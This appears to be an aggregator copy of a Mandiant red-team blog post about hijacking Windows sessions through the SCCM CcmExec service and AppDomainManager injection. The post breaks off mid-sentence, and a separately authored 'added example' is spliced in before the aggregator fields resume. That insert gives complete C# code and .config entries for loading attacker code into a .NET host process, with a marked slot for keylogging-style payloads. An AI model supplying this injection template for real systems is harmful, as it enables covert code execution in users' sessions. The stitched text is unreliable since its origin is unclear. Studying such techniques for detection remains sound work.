Source |
Mandiant |
Identifier |
8500399 |
Publication date |
2024-03-28 13:00:00 (viewed: 2024-05-15 19:06:53) |
Title |
SeeSeeYouExec: Windows Session Hijacking via CcmExec |
Text |
Written by: Andrew Oliveau
Over the last several years, the security community has witnessed an uptick in System Center Configuration Manager (SCCM)-related attacks. From extracting network access account (NAA) credentials to deploying malicious applications to targeted devices, SCCM attacks have aided in accomplishing complex objectives and evading existing detections. Mandiant's Red Team has used SCCM technology to perform novel attacks against mature clients where conventional methodology was not possible. One such SCCM attack is introduced in this blog post.
There was a time when red teamers with elevated privileges on a Windows system could effortlessly inject shellcode into an unsuspecting user's processes. This allowed red teamers to carry out post-exploitation activities from within that process, such as keylogging or accessing LDAP as the affected user. However, as endpoint detection and response (EDR) systems have improved, remote process injection has turned into a risky operation, pushing red teamers to seek alternative methods of hijacking a user's session.
Enter CcmExec, a service native to SCCM Windows clients whose design is useful to red teamers. In this blog post, we delve into how the CcmExec service can be used for session hijacking and introduce CcmPwn, a tool designed to facilitate this technique. Finally, we discuss detection strategies for security teams.
AppDomainManager Injection
Before diving into CcmExec, it is important to understand AppDomainManager injection, a loader hijacking technique used by attackers to execute arbitrary code within a .NET application. In essence, the .NET Framework provides a way to manage application domains, which are isolated environments in which .NET applications run code. The AppDomainManager class is a key part of this infrastructure, responsible for creating and managing these application domains. If an attacker can make the host load their own subclass of AppDomainManager, the code in that subclass's constructor (and in its InitializeNewDomain override) runs inside the hosting application whenever an application domain is created, before any of the application's own code.
The most common method of performing AppDomainManager injection is through a .config file. This approach involves modifying the application's configuration file to name a custom dynamic-link library (DLL) and the AppDomainManager type within it that the .NET runtime should load. Here's how it's done:
Create a custom AppDomainManager: Develop a class that derives from AppDomainManager and includes malicious code. Compile this class into a DLL.
Create a configuration file: Modify or create the application's |
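The two steps above, worked through as an added example that is not part of the original post and not code from Mandiant's CcmPwn tool: a benign AppDomainManager subclass compiled into a DLL, plus the host's .exe.config entries that make the runtime load it. The assembly name DemoAppDomainManager, the namespace DemoInjection, the host name Target.exe and the log file path are illustrative assumptions; the appDomainManagerAssembly and appDomainManagerType elements are the .NET Framework's documented runtime configuration settings.

```csharp
// Added example (not Mandiant's/CcmPwn code): a minimal custom AppDomainManager.
// Build as a .NET Framework class library, e.g.:
//   csc.exe /target:library /out:DemoAppDomainManager.dll DemoAppDomainManager.cs
// Assembly, namespace, host name and log path below are illustrative assumptions.
using System;
using System.IO;

// Pin the version so the full assembly name in the .config matches exactly.
[assembly: System.Reflection.AssemblyVersion("1.0.0.0")]

namespace DemoInjection
{
    // The CLR instantiates this type inside the host process when the host's
    // .config (or the APPDOMAIN_MANAGER_ASM / APPDOMAIN_MANAGER_TYPE environment
    // variables) names it as the AppDomainManager. The class must be public with
    // a public parameterless constructor. Everything in that constructor and in
    // InitializeNewDomain therefore runs in the host's process, as the host's
    // user and in the host's session, before the host's own Main() executes.
    public sealed class DemoAppDomainManager : AppDomainManager
    {
        // Runs when the CLR creates the manager for the default AppDomain.
        public DemoAppDomainManager()
        {
            Log("constructor");
        }

        // Called once per AppDomain before any application code in it runs.
        public override void InitializeNewDomain(AppDomainSetup appDomainInfo)
        {
            Log("InitializeNewDomain: " + AppDomain.CurrentDomain.FriendlyName);
            base.InitializeNewDomain(appDomainInfo);
        }

        // Benign demonstration payload: record which process and user loaded us.
        // Real tradecraft (keylogging, LDAP queries as the user, ...) would sit here.
        private static void Log(string stage)
        {
            string line = string.Format("{0:o} pid={1} user={2} stage={3}",
                DateTime.UtcNow,
                System.Diagnostics.Process.GetCurrentProcess().Id,
                Environment.UserName,
                stage);
            // Hypothetical log location; chosen only so the demo is visible.
            File.AppendAllText(Path.Combine(Path.GetTempPath(), "admgr-demo.log"),
                               line + Environment.NewLine);
        }
    }
}

/* Step 2, the host's configuration file (Target.exe.config, host name assumed).
   Both elements belong to the documented .NET Framework <runtime> schema;
   the DLL must be resolvable by the host, e.g. placed beside Target.exe:

<?xml version="1.0" encoding="utf-8"?>
<configuration>
  <runtime>
    <appDomainManagerAssembly value="DemoAppDomainManager, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null" />
    <appDomainManagerType value="DemoInjection.DemoAppDomainManager" />
  </runtime>
</configuration>
*/
```

Drop the compiled DLL and the modified Target.exe.config next to Target.exe and launch it: the log line carries the host's PID and the interactive user's name and is written before any of the host's own code runs, which is exactly the property the CcmExec technique relies on. Only .NET Framework hosts honor these settings; .NET Core and .NET 5+ hosts do not support a custom AppDomainManager, so the same config entries have no effect there.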
Notes |
★★
|
Sent |
Yes
|
Digest |
1026 7036
|
Tags |
Tool
|